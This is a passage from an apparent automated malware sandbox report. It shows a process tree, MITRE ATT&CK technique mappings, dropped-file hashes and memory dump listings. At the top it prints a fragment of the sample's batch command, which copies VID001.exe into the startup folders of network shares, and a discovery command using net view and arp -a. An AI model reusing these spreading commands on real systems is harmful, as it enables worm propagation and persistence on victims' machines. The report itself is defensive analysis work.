"%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
4⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
5⤵
PID:4640

C:\Windows\SysWOW64\net.exe
net view
6⤵
- Discovers systems in the same network
PID:4652

C:\Windows\SysWOW64\find.exe
find /i "\\"
6⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
5⤵
PID:2896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2344

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2336

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3464

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
PID:828

C:\Windows\System32\slui.exe
C:\Windows\System32\slui.exe -Embedding
1⤵
PID:1264

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

1

T1091

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Modify Registry

6

T1112

Bypass User Account Control

1

T1088

Disabling Security Tools

3

T1089

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

Remote System Discovery

1

T1018

Lateral Movement

Replication Through Removable Media

1

T1091

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0F747584_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
MD5
2915b3f8b703eb744fc54c81f4a9c67f

SHA1
e10361a11f8a7f232ac3cb2125c1875a0a69a3e4

SHA256
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

SHA512
84e53163c255edde6a0f2289b67166ad8c4f3e2b06e92b7d9dd3d8701a58b4c6f6c661be0c9f0777677bcd36de0a7cccc6512d953c4ba12d8b5c6a35617f3816

Download Submit
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
MD5
921379bd587ab29da4dc23fb9d47fe36

SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038

SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6

SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Download Submit
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
MD5
921379bd587ab29da4dc23fb9d47fe36

SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038

SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6

SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Download Submit
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
MD5
0211073feb4ba88254f40a2e6611fcef

SHA1
3ce5aeeac3a1586d291552f541b5e6508f8b7cea

SHA256
62dfe27768e6293eb9218ba22a3acb528df71e4cc4625b95726cd421b716f983

SHA512
6ce06a15c5aa0fd78e01e5a2ef0507c1eba8bfe61ca5fc8d20526cb26f029f730f0ea1c34ce56c3f5db43aff1c2b05aa548b9514b17001c61d2a46660ee11fe7

Download Submit
C:\Windows\SYSTEM.INI
MD5
0df253eb6b6d83e843d9fa865474a8c3

SHA1
4b4ef83d23631c45946452464b0fd0a284f4d0e7

SHA256
39d0a34be3d780bf0222e7352bab4b06f1bdc636f891894ce7f36dd20bcd28c4

SHA512
19ae947eaff7ce8adef0628975c0ac9a6a2a284a3a9b611a83cd13b619f8f45cb11e7a4136cb3eb3a5c3083aed90ce4a8e7eb40aeba47641ac2295d2b42986c8

Download Submit
\Users\Admin\AppData\Local\Temp\nso8285.tmp\inetc.dll
MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
\Users\Admin\AppData\Local\Temp\nso8285.tmp\inetc.dll
MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
\Users\Admin\AppData\Local\Temp\nso8285.tmp\inetc.dll
MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
memory/1696-24-0x0000000000400000-0x00000000009E7000-memory.dmp

Filesize
5.9MB

Download
memory/1696-25-0x0000000000180000-0x0000000000190000-memory.dmp

Filesize
64KB

Download
memory/1696-22-0x0000000000000000-mapping.dmp

Download
memory/1776-20-0x0000000000000000-mapping.dmp

Download
memory/2364-16-0x0000000000000000-mapping.dmp

Download
memory/2464-9-0x00000000023E0000-0x000000000346E000-memory.dmp

Filesize
16.6MB

Download
memory/2464-5-0x0000000000000000-mapping.dmp

Download
memory/2464-12-0x0000000004560000-0x0000000004561000-memory.dmp

Filesize
4KB

Download
memory/2508-17-0x0000000000000000-mapping.dmp

Download
memory/2896-31-0x0000000000000000-mapping.dmp

Download
memory/3052-18-0x0000000000000000-mapping.dmp

Download
memory/3800-19-0x0000000000000000-mapping.dmp

Download
memory/4456-21-0x0000000000000000-mapping.dmp

Download
memory/4492-26-0x0000000000000000-mapping.dmp

Download
memory/4492-32-0x00000000010F0000-0x00000000010F1000-memory.dmp

Filesize
4KB

Download
memory/4640-27-0x0000000000000000-mapping.dmp

Download
memory/4652-28-0x0000000000000000-mapping.dmp

Download
memory/4656-29-0x0000000000000000-mapping.dmp

Download
memory/4692-3-0x0000000002230000-0x0000000002232000-memory.dmp

Filesize
8KB

Download
memory/4692-2-0x00000000024B0000-0x000000000353E000-memory.dmp

Filesize
16.6MB

Download
memory/4692-4-0x0000000002240000-0x0000000002241000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads